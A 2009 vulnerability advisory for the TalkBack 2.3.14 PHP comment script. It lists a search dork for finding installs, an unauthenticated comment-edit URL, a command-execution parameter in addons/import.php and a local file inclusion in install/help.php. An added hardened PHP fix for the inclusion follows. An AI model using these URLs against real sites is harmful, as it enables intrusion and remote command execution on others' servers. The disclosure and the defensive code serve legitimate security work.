
# Title : TalkBack 2.3.14 Multiple Remote Vulnerabilities
# Published : 2009-07-09
# Author : JiKo


JIKO No-exploit.Com
Download: http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip
Script : talkback V 2.3.14
Dork:inurl:test.php Powered by TalkBack
--------------------------------------------
Edit Comment ~[+]
talkback/comments.php?edit=1&edit_id=2&
Command ~[+]
talkback/addons/import.php?result=[Command]
    Code:
        $last_line = system($command, $result);
Local File ~[+]
    Note: only applies if the install folder has not been deleted
http://localhost/test/talkback/install/help.php?language=[File]
    Code:
        $file = "../language/{$_REQUEST['language']}.php";
        if (!is_file($file))
            exit("Language file '$file' does not exist");
        include ($file);
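
A hardened form of the install/help.php language include quoted above, as an added example that is not TalkBack's code or the advisory author's. It assumes PHP 7.4+; the function name resolve_language_file and the 'english' fallback are hypothetical.

```php
<?php
// Added example: replacement for the include in install/help.php.
// resolve_language_file() is a hypothetical helper, not part of TalkBack.

/**
 * Map a requested language name to a file directly inside $languageDir.
 * Returns the absolute path, or null when the request must be rejected.
 */
function resolve_language_file(string $requested, string $languageDir): ?string
{
    // 1. Syntax: short identifier only, so no dots, slashes or NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }

    // 2. Allowlist: the name must match a file that ships in the directory.
    $base = realpath($languageDir);
    if ($base === false) {
        return null;
    }
    $available = array_map(
        static fn(string $p): string => basename($p, '.php'),
        glob($base . DIRECTORY_SEPARATOR . '*.php') ?: []
    );
    if (!in_array($requested, $available, true)) {
        return null;
    }

    // 3. Containment: the resolved path (symlinks followed) must still
    //    sit directly under the language directory.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Used in place of the original three lines. The 'english' default is an assumption.
$requested = isset($_REQUEST['language']) && is_string($_REQUEST['language'])
    ? $_REQUEST['language'] : 'english';
$file = resolve_language_file($requested, __DIR__ . '/../language');
if ($file === null) {
    http_response_code(400);
    exit('Unknown language'); // the original echoed the request value back in its error
}
include $file;
```

Deleting the install folder after setup, as the note above implies, removes this entry point entirely; the check covers deployments where it is left in place.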
